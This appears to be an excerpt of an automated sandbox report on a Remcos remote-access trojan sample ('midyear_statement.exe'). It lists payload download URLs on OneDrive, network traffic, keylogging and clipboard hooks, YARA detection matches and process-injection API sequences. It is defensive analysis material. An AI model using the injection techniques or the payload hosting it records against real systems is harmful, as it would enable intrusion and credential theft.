Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv348F.tmp.27.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wkrriuhD.pif String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv348F.tmp.27.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,00000000 24_2_1233A2B8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard, 24_2_1233B70E
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 24_2_123468C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 27_2_0040987A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 27_2_004098E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 28_2_00406DFC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 28_2_00406E9F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard, 24_2_1233B70E
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 24_2_1233A3E0

E-Banking Fraud

Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234C9E2 SystemParametersInfoW, 24_2_1234C9E2

System Summary

Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BCD1C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_040BCD1C
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BCE00 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_040BCE00
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_040B7EE8
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess, 0_2_040BD850
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B78F8 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_040B78F8
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_040B7A50
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BA160 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory, 0_2_040BA160
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040C62C4 CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess, 0_2_040C62C4
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess, 0_2_040BD850
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BCD1A RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_040BCD1A
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7EE6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_040B7EE6
